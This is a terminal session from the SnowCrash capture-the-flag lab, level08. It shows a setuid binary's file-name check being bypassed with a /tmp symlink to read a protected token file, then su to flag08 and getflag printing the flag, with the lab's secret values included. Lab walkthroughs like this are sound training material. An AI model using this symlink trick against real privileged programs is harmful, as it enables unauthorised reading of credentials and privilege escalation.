level08@SnowCrash:~$ ls -la
total 28
dr-xr-x---+ 1 level08 level08  140 Mar  5  2016 .
d--x--x--x  1 root    users    340 Aug 30  2015 ..
-r-x------  1 level08 level08  220 Apr  3  2012 .bash_logout
-r-x------  1 level08 level08 3518 Aug 30  2015 .bashrc
-rwsr-s---+ 1 flag08  level08 8617 Mar  5  2016 level08
-r-x------  1 level08 level08  675 Apr  3  2012 .profile
-rw-------  1 flag08  flag08    26 Mar  5  2016 token
level08@SnowCrash:~$ strings level08 
/lib/ld-linux.so.2
...
%s [file to read]
token
You may not access '%s'
Unable to open %s
Unable to read fd %d
..
level08@SnowCrash:~$ ltrace ./level08 
__libc_start_main(0x8048554, 1, 0xbffff7f4, 0x80486b0, 0x8048720 <unfinished ...>
printf("%s [file to read]\n", "./level08"./level08 [file to read]
)                            = 25
exit(1 <unfinished ...>
+++ exited (status 1) +++
level08@SnowCrash:~$ ./level08 't\o\k\e\n'
level08: Unable to open t\o\k\e\n: No such file or directory
level08@SnowCrash:~$ ./level08 't o k e n'
level08: Unable to open t o k e n: No such file or directory
...
level08@SnowCrash:~$ ln -s /home/user/level08/token /tmp/tok
level08@SnowCrash:~$ ls -la /tmp/tok
lrwxrwxrwx 1 level08 level08 24 Jan  4 14:54 /tmp/tok -> /home/user/level08/token
level08@SnowCrash:~$ ./level08 /tmp/tok
quif5eloekouj29ke0vouxean
level08@SnowCrash:~$ su flag08
Password: 
Don't forget to launch getflag !
flag08@SnowCrash:~$ getflag
Check flag.Here is your token : 25749xKZ8L7DkSCwJkT9dyv6f
